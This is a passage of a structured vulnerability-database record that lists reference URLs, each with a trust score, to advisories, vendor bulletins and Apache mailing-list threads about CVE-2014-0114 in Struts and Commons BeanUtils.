1.6, url: "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/60177", }, { trust: 1.6, url: 
"https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/60703", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59718", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, 
url: "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e", }, { trust: 1.6, url: "http://marc.info/?l=bugtraq&m=140801096002766&w=2", }, { trust: 1.6, url: "https://security.netapp.com/advisory/ntap-20180629-0006/", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e", }, { trust: 1.6, url: "https://access.redhat.com/solutions/869353", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e", }, { trust: 1.2, url: "https://rhn.redhat.com/errata/rhsa-2014-0497.html", }, { trust: 1, url: "https://rhn.redhat.com/errata/rhsa-2014-0498.html", }, { trust: 1, url: "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755", }, { trust: 1, url: "http://struts.apache.org/release/2.3.x/docs/s2-021.html", }, { trust: 1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0114", }, { trust: 0.9, url: 
"http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation", }, { trust: 0.9, url: "http://kb.juniper.net/infocenter/index?page=content&id=jsa10643&cat=sirt_1&actp=list", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674435", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674428", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674937", }, { trust: 0.9, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675822", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673663", }, { trust: 0.9, url: "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21672316", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676375", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673098", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673944", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673101", }, { trust: 0.9, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728", }, { trust: 0.9, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21680848", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676646", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042186", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042185", }, { trust: 0.9, url: 
"http://www-01.ibm.com/support/docview.wss?uid=swg27042184", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037507", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21678830", }, { trust: 0.9, url: "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037825", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037409", }, { trust: 0.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037506", }, { trust: 0.9, url: "https://rhn.redhat.com/errata/rhsa-2014-0500.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673757", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673508", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673695", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674099", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674104", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673992", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674110", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673982", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673422", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21678359", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21680716", }, { trust: 0.9, url: 
"https://www-304.ibm.com/support/docview.wss?uid=swg21675387", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21677802", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674310", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674191", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674017", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674016", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674339", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21677449", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675496", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676485", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21677298", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674613", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676091", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673878", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673877", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674113", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674905", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21679331", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21680698", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037424", }, { trust: 0.9, url: "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21680194", }, { trust: 0.9, url: "http://jvn.jp/en/jp/jvn30962312/index.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21677352", }, { 
trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037622", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e", }, { trust: 0.6, url: 
"https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e", }, { trust: 0.6, url: 
"https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e", }, { trust: 0.6, url: 
"https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e", }, { trust: 0.6, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e", }, { trust: 0.6, url: 
"https://www-01.ibm.com/support/docview.wss?uid=ibm10795183", }, { trust: 0.6, url: "http://www.ibm.com/support/docview.wss?uid=ibm10872142", }, { trust: 0.6, url: "https://issues.apache.org/jira/browse/beanutils-520", }, { trust: 0.6, url: "https://www.mail-archive.com/announce@apache.org/msg05413.html", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887121", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10957873", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887119", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887113", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10888007", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887999", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10887973", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10888009", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/75922", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.2568/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1427/", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/6494701", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/", 
}, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.2355/", }, { trust: 0.6, url: "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2293.2/", }, { trust: 0.6, url: "http://www.ibm.com/support/docview.wss?uid=ibm10879093", }, { trust: 0.6, url: "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/78218", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.3134/", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2022072128", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/", }, { trust: 0.3, url: "http://struts.apache.org/", }, { trust: 0.3, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674379", }, { trust: 0.3, url: "www-01.ibm.com/support/docview.wss?uid=swg21677335", }, { trust: 0.3, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.3, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.3, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.3, url: "https://bugzilla.redhat.com/):", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2014-0114", }, { trust: 0.2, url: 
"https://h20564.www2.hp.com/portal/site/hpsc/public/kb/", }, { trust: 0.2, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/", }, { trust: 0.2, url: "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1000129", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1271", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000342", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000352", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000346", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1114", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-5397", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-14063", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000343", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1338", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-14063", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1000130", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000342", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000352", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1114", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1272", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000346", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000339", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000340", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000341", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000341", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.1/", }, { trust: 0.1, url: 
"https://access.redhat.com/security/cve/cve-2018-8088", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000343", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-8036", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000344", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000345", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000338", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1272", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse&downloadtype=distributions&version=7.1.0", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000340", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1000129", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1339", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1000180", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1339", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000338", }, { trust: 0.1, url: "https://access.redhat.com/articles/2939351", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000339", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1271", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1000130", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-8036", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-1000180", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-8088", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-5397", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-1338", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-1000344", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-1000345", }, { trust: 0.1, url: 
"https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise&downloadtype=securitypatches&version=7.1.0", }, { trust: 0.1, url: "https://www.redhat.com/security/data/cve/cve-2014-0114.html", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/advisories/", }, { trust: 0.1, url: "http://www.openwall.com/ove/", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00321", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00320", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00322", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00324", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00318", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00319", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00316", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00315", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00323", }, { trust: 0.1, url: "http://support.openview.hp.com/selfsolve/document/lid/sis_00317", }, { trust: 0.1, url: "http://creativecommons.org/licenses/by-sa/2.5", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114", }, { trust: 0.1, url: "https://security.gentoo.org/", }, { trust: 0.1, url: "https://bugs.gentoo.org.", }, { trust: 0.1, url: "https://issues.jboss.org/):", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.amq.broker&version=7.5.0", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/", }, { trust: 0.1, url: 
